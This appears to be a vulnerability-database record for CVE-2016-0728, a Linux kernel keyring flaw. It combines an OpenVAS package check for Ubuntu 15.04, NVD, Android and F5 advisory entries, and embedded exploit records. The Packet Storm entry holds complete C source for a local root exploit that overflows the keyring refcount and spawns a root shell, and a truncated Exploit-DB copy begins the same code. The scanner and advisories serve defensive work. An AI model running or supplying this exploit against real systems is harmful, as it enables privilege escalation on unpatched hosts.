ID OPENVAS:1361412562310842603 Type openvas Reporter Copyright (C) 2016 Greenbone Networks GmbH Modified 2019-03-13T00:00:00
Description
The remote host is missing an update for the
###############################################################################
# OpenVAS Vulnerability Test
#
# Ubuntu Update for linux USN-2871-1
#
# Authors:
# System Generated Check
#
# Copyright:
# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################
if(description)
{
script_oid("1.3.6.1.4.1.25623.1.0.842603");
script_version("$Revision: 14140 $");
script_tag(name:"last_modification", value:"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $");
script_tag(name:"creation_date", value:"2016-01-20 06:16:15 +0100 (Wed, 20 Jan 2016)");
script_cve_id("CVE-2016-0728");
script_tag(name:"cvss_base", value:"7.2");
script_tag(name:"cvss_base_vector", value:"AV:L/AC:L/Au:N/C:C/I:C/A:C");
script_tag(name:"qod_type", value:"package");
script_name("Ubuntu Update for linux USN-2871-1");
script_tag(name:"summary", value:"The remote host is missing an update for the 'linux'
package(s) announced via the referenced advisory.");
script_tag(name:"vuldetect", value:"Checks if a vulnerable version is present on the target host.");
script_tag(name:"insight", value:"Yevgeny Pats discovered that the session
keyring implementation in the Linux kernel did not properly reference count
when joining an existing session keyring. A local attacker could use this to
cause a denial of service (system crash) or possibly execute arbitrary code with
administrative privileges.");
script_tag(name:"affected", value:"linux on Ubuntu 15.04");
script_tag(name:"solution", value:"Please Install the Updated Packages.");
script_xref(name:"USN", value:"2871-1");
script_xref(name:"URL", value:"http://www.ubuntu.com/usn/usn-2871-1/");
script_tag(name:"solution_type", value:"VendorFix");
script_category(ACT_GATHER_INFO);
script_copyright("Copyright (C) 2016 Greenbone Networks GmbH");
script_family("Ubuntu Local Security Checks");
script_dependencies("gather-package-list.nasl");
script_mandatory_keys("ssh/login/ubuntu_linux", "ssh/login/packages", re:"ssh/login/release=UBUNTU15\.04");
exit(0);
}
include("revisions-lib.inc");
include("pkg-lib-deb.inc");
release = dpkg_get_ssh_release();
if(!release)
exit(0);
res = "";
if(release == "UBUNTU15.04")
{
if ((res = isdpkgvuln(pkg:"linux-image-3.19.0-47-generic", ver:"3.19.0-47.53", rls:"UBUNTU15.04")) != NULL)
{
security_message(data:res);
exit(0);
}
if ((res = isdpkgvuln(pkg:"linux-image-3.19.0-47-generic-lpae", ver:"3.19.0-47.53", rls:"UBUNTU15.04")) != NULL)
{
security_message(data:res);
exit(0);
}
if ((res = isdpkgvuln(pkg:"linux-image-3.19.0-47-lowlatency", ver:"3.19.0-47.53", rls:"UBUNTU15.04")) != NULL)
{
security_message(data:res);
exit(0);
}
if ((res = isdpkgvuln(pkg:"linux-image-3.19.0-47-powerpc-e500mc", ver:"3.19.0-47.53", rls:"UBUNTU15.04")) != NULL)
{
security_message(data:res);
exit(0);
}
if ((res = isdpkgvuln(pkg:"linux-image-3.19.0-47-powerpc-smp", ver:"3.19.0-47.53", rls:"UBUNTU15.04")) != NULL)
{
security_message(data:res);
exit(0);
}
if ((res = isdpkgvuln(pkg:"linux-image-3.19.0-47-powerpc64-emb", ver:"3.19.0-47.53", rls:"UBUNTU15.04")) != NULL)
{
security_message(data:res);
exit(0);
}
if ((res = isdpkgvuln(pkg:"linux-image-3.19.0-47-powerpc64-smp", ver:"3.19.0-47.53", rls:"UBUNTU15.04")) != NULL)
{
security_message(data:res);
exit(0);
}
if (__pkg_match) exit(99);
exit(0);
}
{"id": "OPENVAS:1361412562310842603", "type": "openvas", "bulletinFamily": "scanner", "title": "Ubuntu Update for linux USN-2871-1", "description": "The remote host is missing an update for the ", "published": "2016-01-20T00:00:00", "modified": "2019-03-13T00:00:00", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842603", "reporter": "Copyright (C) 2016 Greenbone Networks GmbH", "references": ["2871-1", "http://www.ubuntu.com/usn/usn-2871-1/"], "cvelist": ["CVE-2016-0728"], "lastseen": "2019-05-29T18:35:24", "viewCount": 2, "enchantments": {"dependencies": {"references": [{"type": "android", "idList": ["ANDROID:CVE-2016-0728"]}, {"type": "cve", "idList": ["CVE-2016-0728"]}, {"type": "f5", "idList": ["SOL01948202", "F5:K01948202"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:135330"]}, {"type": "exploitdb", "idList": ["EDB-ID:40003", "EDB-ID:39277"]}, {"type": "redhat", "idList": ["RHSA-2016:0065", "RHSA-2016:0068", "RHSA-2016:0064", "RHSA-2016:0103"]}, {"type": "threatpost", "idList": ["THREATPOST:C5F01C375D7DB776A2A5902570B2E5FD", "THREATPOST:3457E4B368AF24E94CB5545AC02382A8", "THREATPOST:45807D1856E34DEFF51A771D0E730AA3"]}, {"type": "ubuntu", "idList": ["USN-2872-3", "USN-2872-1", "USN-2871-1", "USN-2871-2", "USN-2872-2", "USN-2870-1", "USN-2870-2", "USN-2873-1"]}, {"type": "zdt", "idList": ["1337DAY-ID-25517", "1337DAY-ID-25516"]}, {"type": "suse", "idList": ["SUSE-SU-2016:0746-1", "SUSE-SU-2016:0745-1", "SUSE-SU-2016:0750-1", "SUSE-SU-2016:0186-1", "SUSE-SU-2016:0341-1", "SUSE-SU-2016:0205-1", "SUSE-SU-2016:0757-1", "SUSE-SU-2016:0753-1", "SUSE-SU-2016:0747-1", "SUSE-SU-2016:0756-1"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:3459535A8A480A3A2F164DB01F4CF994", "EXPLOITPACK:4CC02E891FC223E9BA1344151AC6958F"]}, {"type": "amazon", "idList": ["ALAS-2016-642"]}, {"type": "oraclelinux", "idList": ["ELSA-2016-0064", "ELSA-2016-0185", "ELSA-2016-3509", "ELSA-2016-3510"]}, {"type": "symantec", "idList": ["SMNTC-1349"]}, {"type": "centos", "idList": ["CESA-2016:0064"]}, {"type": "archlinux", "idList": ["ASA-201601-26", "ASA-201601-20"]}, {"type": "seebug", "idList": ["SSV:90673", "SSV:91603"]}, {"type": "thn", "idList": ["THN:2F321B0D3CF635D0F8D272948E9B31C9"]}, {"type": "cisa", "idList": ["CISA:FCB4B9C4CB605F6B805399E8D3B54A48"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310131199", "OPENVAS:1361412562310842606", "OPENVAS:1361412562310120632", "OPENVAS:1361412562310842612", "OPENVAS:1361412562310842611", "OPENVAS:1361412562310122854", "OPENVAS:1361412562310842608", "OPENVAS:1361412562310871546", "OPENVAS:1361412562310842609", "OPENVAS:1361412562310122851"]}, {"type": "nessus", "idList": ["REDHAT-RHSA-2016-0065.NASL", "CENTOS_RHSA-2016-0064.NASL", "UBUNTU_USN-2871-2.NASL", "ALA_ALAS-2016-642.NASL", "UBUNTU_USN-2873-1.NASL", "UBUNTU_USN-2872-1.NASL", "UBUNTU_USN-2872-3.NASL", "SUSE_SU-2016-0205-1.NASL", "ORACLELINUX_ELSA-2016-3509.NASL", "ORACLELINUX_ELSA-2016-3510.NASL"]}, {"type": "hp", "idList": ["HP:C05018265"]}, {"type": "fedora", "idList": ["FEDORA:A5C89601FC0F"]}, {"type": "debian", "idList": ["DEBIAN:DSA-3448-1:C7742"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:B216B7A8351B0F6B0DD9F8038436A48C"]}], "modified": "2019-05-29T18:35:24", "rev": 2}, "score": {"value": 7.6, "vector": "NONE", "modified": "2019-05-29T18:35:24", "rev": 2}, "vulnersScore": 7.6}, "pluginID": "1361412562310842603", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for linux USN-2871-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842603\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-01-20 06:16:15 +0100 (Wed, 20 Jan 2016)\");\n script_cve_id(\"CVE-2016-0728\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux USN-2871-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Yevgeny Pats discovered that the session\n keyring implementation in the Linux kernel did not properly reference count\n when joining an existing session keyring. A local attacker could use this to\n cause a denial of service (system crash) or possibly execute arbitrary code with\n administrative privileges.\");\n script_tag(name:\"affected\", value:\"linux on Ubuntu 15.04\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"2871-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-2871-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU15\\.04\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU15.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.19.0-47-generic\", ver:\"3.19.0-47.53\", rls:\"UBUNTU15.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.19.0-47-generic-lpae\", ver:\"3.19.0-47.53\", rls:\"UBUNTU15.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.19.0-47-lowlatency\", ver:\"3.19.0-47.53\", rls:\"UBUNTU15.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.19.0-47-powerpc-e500mc\", ver:\"3.19.0-47.53\", rls:\"UBUNTU15.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.19.0-47-powerpc-smp\", ver:\"3.19.0-47.53\", rls:\"UBUNTU15.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.19.0-47-powerpc64-emb\", ver:\"3.19.0-47.53\", rls:\"UBUNTU15.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.19.0-47-powerpc64-smp\", ver:\"3.19.0-47.53\", rls:\"UBUNTU15.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "naslFamily": "Ubuntu Local Security Checks"}
{"android": [{"lastseen": "2020-12-24T13:21:13", "bulletinFamily": "software", "cvelist": ["CVE-2016-0728"], "description": "The join_session_keyring function in security/keys/process_keys.c in the Linux kernel before 4.4.1 mishandles object references in a certain error case, which allows local users to gain privileges or cause a denial of service (integer overflow and use-after-free) via crafted keyctl commands.", "edition": 2, "modified": "2019-07-29T00:00:00", "published": "2016-03-01T00:00:00", "id": "ANDROID:CVE-2016-0728", "href": "http://www.androidvulnerabilities.org/vulnerabilities/CVE-2016-0728.html", "title": "CVE-2016-0728", "type": "android", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2020-12-09T20:07:32", "description": "The join_session_keyring function in security/keys/process_keys.c in the Linux kernel before 4.4.1 mishandles object references in a certain error case, which allows local users to gain privileges or cause a denial of service (integer overflow and use-after-free) via crafted keyctl commands.\n<a href=\"http://cwe.mitre.org/data/definitions/190.html\">CWE-190: Integer Overflow or Wraparound</a> <br />\n\n<a href=\"http://cwe.mitre.org/data/definitions/416.html\">CWE-416: Use After Free</a>", "edition": 5, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-02-08T03:59:00", "title": "CVE-2016-0728", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0728"], "modified": "2017-11-10T02:29:00", "cpe": ["cpe:/o:google:android:6.0", "cpe:/o:google:android:5.1.0", "cpe:/o:google:android:4.2", "cpe:/o:google:android:4.1", "cpe:/o:google:android:5.0.2", "cpe:/a:hp:server_migration_pack:7.5", "cpe:/o:google:android:4.4.2", "cpe:/o:google:android:4.0", "cpe:/o:google:android:4.4.1", "cpe:/o:google:android:4.0.3", "cpe:/o:google:android:4.3", "cpe:/o:google:android:4.0.4", "cpe:/o:google:android:5.0", "cpe:/o:linux:linux_kernel:4.4", "cpe:/o:google:android:4.2.1", "cpe:/o:google:android:5.1.1", "cpe:/o:google:android:4.2.2", "cpe:/o:google:android:5.1", "cpe:/o:google:android:4.3.1", "cpe:/o:google:android:6.0.1", "cpe:/o:google:android:4.1.2", "cpe:/o:google:android:4.0.2", "cpe:/o:google:android:4.4.3", "cpe:/o:google:android:5.0.1", "cpe:/o:google:android:4.0.1", "cpe:/o:google:android:4.4"], "id": "CVE-2016-0728", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-0728", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:4.4:*:*:*:*:*:*:*", "cpe:2.3:o:google:android:5.1.0:*:*:*:*:*:*:*", "cpe:2.3:o:google:android:4.4.3:*:*:*:*:*:*:*", "cpe:2.3:o:google:android:4.0.1:*:*:*:*:*:*:*", "cpe:2.3:o:google:android:5.0.2:*:*:*:*:*:*:*", "cpe:2.3:o:google:android:4.1:*:*:*:*:*:*:*", "cpe:2.3:o:google:android:5.0.1:*:*:*:*:*:*:*", "cpe:2.3:o:google:android:4.0:*:*:*:*:*:*:*", "cpe:2.3:a:hp:server_migration_pack:7.5:*:*:*:*:*:*:*", "cpe:2.3:o:google:android:4.4:*:*:*:*:*:*:*", "cpe:2.3:o:google:android:4.3.1:*:*:*:*:*:*:*", "cpe:2.3:o:google:android:4.3:*:*:*:*:*:*:*", "cpe:2.3:o:google:android:4.2:*:*:*:*:*:*:*", "cpe:2.3:o:google:android:4.0.3:*:*:*:*:*:*:*", "cpe:2.3:o:google:android:4.2.1:*:*:*:*:*:*:*", "cpe:2.3:o:google:android:4.4.2:*:*:*:*:*:*:*", "cpe:2.3:o:google:android:6.0.1:*:*:*:*:*:*:*", "cpe:2.3:o:google:android:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:google:android:5.1:*:*:*:*:*:*:*", "cpe:2.3:o:google:android:4.0.4:*:*:*:*:*:*:*", "cpe:2.3:o:google:android:4.4.1:*:*:*:*:*:*:*", "cpe:2.3:o:google:android:5.0:*:*:*:*:*:*:*", "cpe:2.3:o:google:android:4.1.2:*:*:*:*:*:*:*", "cpe:2.3:o:google:android:4.2.2:*:*:*:*:*:*:*", "cpe:2.3:o:google:android:5.1.1:*:*:*:*:*:*:*", "cpe:2.3:o:google:android:4.0.2:*:*:*:*:*:*:*"]}], "f5": [{"lastseen": "2020-04-06T22:40:01", "bulletinFamily": "software", "cvelist": ["CVE-2016-0728"], "description": "\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table.\n\nProduct | Versions known to be vulnerable | Versions known to be not vulnerable | Severity | Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM | None | 12.0.0 \n11.0.0 - 11.6.0 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP AAM | None | 12.0.0 \n11.4.0 - 11.6.0 | Not vulnerable | None \nBIG-IP AFM | None | 12.0.0 \n11.3.0 - 11.6.0 | Not vulnerable | None \nBIG-IP Analytics | None | 12.0.0 \n11.0.0 - 11.6.0 | Not vulnerable | None \nBIG-IP APM | None | 12.0.0 \n11.0.0 - 11.6.0 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP ASM | None | 12.0.0 \n11.0.0 - 11.6.0 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP DNS | None | 12.0.0 | Not vulnerable | None \nBIG-IP Edge Gateway | None | 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP GTM | None | 11.0.0 - 11.6.0 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP Link Controller | None | 12.0.0 \n11.0.0 - 11.6.0 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP PEM | None | 12.0.0 \n11.3.0 - 11.6.0 | Not vulnerable | None \nBIG-IP PSM | None | 11.0.0 - 11.4.1 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP WebAccelerator | None | 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP WOM | None | 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4 | Not vulnerable | None \nARX | None | 6.0.0 - 6.4.0 | Not vulnerable | None \nEnterprise Manager | None | 3.0.0 - 3.1.1 | Not vulnerable | None \nFirePass | None | 7.0.0 \n6.0.0 - 6.1.0 | Not vulnerable | None \nBIG-IQ Cloud | None | 4.0.0 - 4.5.0 | Not vulnerable | None \nBIG-IQ Device | None | 4.2.0 - 4.5.0 | Not vulnerable | None \nBIG-IQ Security | None | 4.0.0 - 4.5.0 | Not vulnerable | None \nBIG-IQ ADC | None | 4.5.0 | Not vulnerable | None \nBIG-IQ Centralized Management | None | 4.6.0 | Not vulnerable | None \nBIG-IQ Cloud and Orchestration | None | 1.0.0 | Not vulnerable | None \nLineRate | None | 2.5.0 - 2.6.1 | Not vulnerable | None \nF5 WebSafe* | None | 1.0.0 | Not vulnerable | None \nTraffix SDC | None | 4.0.0 \n3.3.2 - 3.5.1 | Not vulnerable | None \n \n*F5 WebSafe software is not affected by this vulnerability because the Linux kernel does not form part of the product. F5 recommends that customers upgrade the operating system used with the F5 WebSafe Dashboard using the standard OS tools to address CVE-2016-0728.\n\nNone\n\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n", "edition": 1, "modified": "2019-05-08T22:08:00", "published": "2016-01-23T02:26:00", "id": "F5:K01948202", "href": "https://support.f5.com/csp/article/K01948202", "title": "Linux kernel vulnerability CVE-2016-0728", "type": "f5", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2016-09-26T17:23:22", "bulletinFamily": "software", "cvelist": ["CVE-2016-0728"], "edition": 1, "description": "Vulnerability Recommended Actions\n\nNone\n\nSupplemental Information\n\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n", "modified": "2016-04-26T00:00:00", "published": "2016-01-22T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/k/01/sol01948202.html", "id": "SOL01948202", "title": "SOL01948202 - Linux kernel vulnerability CVE-2016-0728", "type": "f5", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:13:52", "description": "", "published": "2016-01-20T00:00:00", "type": "packetstorm", "title": "Linux Kernel REFCOUNT Overflow / Use-After-Free", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-0728"], "modified": "2016-01-20T00:00:00", "id": "PACKETSTORM:135330", "href": "https://packetstormsecurity.com/files/135330/Linux-Kernel-REFCOUNT-Overflow-Use-After-Free.html", "sourceData": "`# Exploit Title: Linux kernel REFCOUNT overflow/Use-After-Free in keyrings \n# Date: 19/1/2016 \n# Exploit Author: Perception Point Team \n# CVE : CVE-2016-0728 \n \n/* CVE-2016-0728 local root exploit \nmodified by Federico Bento to read kernel symbols from /proc/kallsyms \nprops to grsecurity/PaX for preventing this in so many ways \n \n$ gcc cve_2016_0728.c -o cve_2016_0728 -lkeyutils -Wall \n$ ./cve_2016_072 PP_KEY */ \n \n#include <stdio.h> \n#include <stdlib.h> \n#include <string.h> \n#include <sys/types.h> \n#include <keyutils.h> \n#include <unistd.h> \n#include <time.h> \n#include <unistd.h> \n \n#include <sys/ipc.h> \n#include <sys/msg.h> \n \ntypedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred); \ntypedef unsigned long __attribute__((regparm(3))) (* \n_prepare_kernel_cred)(unsigned long cred); \n_commit_creds commit_creds; \n_prepare_kernel_cred prepare_kernel_cred; \n \n#define STRUCT_LEN (0xb8 - 0x30) \n#define COMMIT_CREDS_ADDR (0xffffffff810bb050) \n#define PREPARE_KERNEL_CREDS_ADDR (0xffffffff810bb370) \n \n \n \nstruct key_type { \nchar * name; \nsize_t datalen; \nvoid * vet_description; \nvoid * preparse; \nvoid * free_preparse; \nvoid * instantiate; \nvoid * update; \nvoid * match_preparse; \nvoid * match_free; \nvoid * revoke; \nvoid * destroy; \n}; \n \n/* thanks spender - Federico Bento */ \nstatic unsigned long get_kernel_sym(char *name) \n{ \nFILE *f; \nunsigned long addr; \nchar dummy; \nchar sname[256]; \nint ret; \n \nf = fopen(\"/proc/kallsyms\", \"r\"); \nif (f == NULL) { \nfprintf(stdout, \"Unable to obtain symbol listing!\\n\"); \nexit(0); \n} \n \nret = 0; \nwhile(ret != EOF) { \nret = fscanf(f, \"%p %c %s\\n\", (void **)&addr, &dummy, sname); \nif (ret == 0) { \nfscanf(f, \"%s\\n\", sname); \ncontinue; \n} \nif (!strcmp(name, sname)) { \nfprintf(stdout, \"[+] Resolved %s to %p\\n\", name, (void *)addr); \nfclose(f); \nreturn addr; \n} \n} \n \nfclose(f); \nreturn 0; \n} \n \nvoid userspace_revoke(void * key) { \ncommit_creds(prepare_kernel_cred(0)); \n} \n \nint main(int argc, const char *argv[]) { \nconst char *keyring_name; \nsize_t i = 0; \nunsigned long int l = 0x100000000/2; \nkey_serial_t serial = -1; \npid_t pid = -1; \nstruct key_type * my_key_type = NULL; \n \nstruct { \nlong mtype; \nchar mtext[STRUCT_LEN]; \n} msg = {0x4141414141414141, {0}}; \nint msqid; \n \nif (argc != 2) { \nputs(\"usage: ./keys <key_name>\"); \nreturn 1; \n} \n \nprintf(\"[+] uid=%d, euid=%d\\n\", getuid(), geteuid()); \ncommit_creds = (_commit_creds)get_kernel_sym(\"commit_creds\"); \nprepare_kernel_cred = \n(_prepare_kernel_cred)get_kernel_sym(\"prepare_kernel_cred\"); \nif(commit_creds == NULL || prepare_kernel_cred == NULL) { \ncommit_creds = (_commit_creds)COMMIT_CREDS_ADDR; \nprepare_kernel_cred = \n(_prepare_kernel_cred)PREPARE_KERNEL_CREDS_ADDR; \nif(commit_creds == (_commit_creds)0xffffffff810bb050 \n|| prepare_kernel_cred == (_prepare_kernel_cred)0xffffffff810bb370) \nputs(\"[-] You probably need to change the address of \ncommit_creds and prepare_kernel_cred in source\"); \n} \n \nmy_key_type = malloc(sizeof(*my_key_type)); \n \nmy_key_type->revoke = (void*)userspace_revoke; \nmemset(msg.mtext, 'A', sizeof(msg.mtext)); \n \n// key->uid \n*(int*)(&msg.mtext[56]) = 0x3e8; /* geteuid() */ \n//key->perm \n*(int*)(&msg.mtext[64]) = 0x3f3f3f3f; \n \n//key->type \n*(unsigned long *)(&msg.mtext[80]) = (unsigned long)my_key_type; \n \nif ((msqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT)) == -1) { \nperror(\"msgget\"); \nexit(1); \n} \n \nkeyring_name = argv[1]; \n \n/* Set the new session keyring before we start */ \n \nserial = keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name); \nif (serial < 0) { \nperror(\"keyctl\"); \nreturn -1; \n} \n \nif (keyctl(KEYCTL_SETPERM, serial, KEY_POS_ALL | KEY_USR_ALL | \nKEY_GRP_ALL | KEY_OTH_ALL) < 0) { \nperror(\"keyctl\"); \nreturn -1; \n} \n \n \nputs(\"[+] Increfing...\"); \nfor (i = 1; i < 0xfffffffd; i++) { \nif (i == (0xffffffff - l)) { \nl = l/2; \nsleep(5); \n} \nif (keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name) < 0) { \nperror(\"[-] keyctl\"); \nreturn -1; \n} \n} \nsleep(5); \n/* here we are going to leak the last references to overflow */ \nfor (i=0; i<5; ++i) { \nif (keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name) < 0) { \nperror(\"[-] keyctl\"); \nreturn -1; \n} \n} \n \nputs(\"[+] Finished increfing\"); \nputs(\"[+] Forking...\"); \n/* allocate msg struct in the kernel rewriting the freed keyring \nobject */ \nfor (i=0; i<64; i++) { \npid = fork(); \nif (pid == -1) { \nperror(\"[-] fork\"); \nreturn -1; \n} \n \nif (pid == 0) { \nsleep(2); \nif ((msqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT)) == -1) { \nperror(\"[-] msgget\"); \nexit(1); \n} \nfor (i = 0; i < 64; i++) { \nif (msgsnd(msqid, &msg, sizeof(msg.mtext), 0) == -1) { \nperror(\"[-] msgsnd\"); \nexit(1); \n} \n} \nsleep(-1); \nexit(1); \n} \n} \n \nputs(\"[+] Finished forking\"); \nsleep(5); \n \n/* call userspace_revoke from kernel */ \nputs(\"[+] Caling revoke...\"); \nif (keyctl(KEYCTL_REVOKE, KEY_SPEC_SESSION_KEYRING) == -1) { \nperror(\"[+] keyctl_revoke\"); \n} \n \nprintf(\"uid=%d, euid=%d\\n\", getuid(), geteuid()); \nexecl(\"/bin/sh\", \"/bin/sh\", NULL); \n \nreturn 0; \n} \n \n \n`\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/135330/linuxrefcount-uaf.txt"}], "exploitdb": [{"lastseen": "2016-06-22T17:14:07", "description": "Linux Kernel <= 4.4.1 - REFCOUNT Overflow/Use-After-Free in Keyrings Local Root (2). CVE-2016-0728. Local exploit for linux platform", "published": "2016-01-19T00:00:00", "type": "exploitdb", "title": "Linux Kernel <= 4.4.1 - REFCOUNT Overflow/Use-After-Free in Keyrings Local Root 2", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-0728"], "modified": "2016-01-19T00:00:00", "id": "EDB-ID:40003", "href": "https://www.exploit-db.com/exploits/40003/", "sourceData": "/*\r\n# Exploit Title: Linux kernel REFCOUNT overflow/Use-After-Free in keyrings\r\n# Date: 19/1/2016\r\n# Exploit Author: Perception Point Team\r\n# CVE : CVE-2016-0728\r\n*/\r\n\r\n/* CVE-2016-0728 local root exploit\r\n modified by Federico Bento to read kernel symbols from /proc/kallsyms\r\n props to grsecurity/PaX for preventing this in so many ways\r\n\r\n $ gcc cve_2016_0728.c -o cve_2016_0728 -lkeyutils -Wall\r\n $ ./cve_2016_072 PP_KEY */\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <sys/types.h>\r\n#include <keyutils.h>\r\n#include <unistd.h>\r\n#include 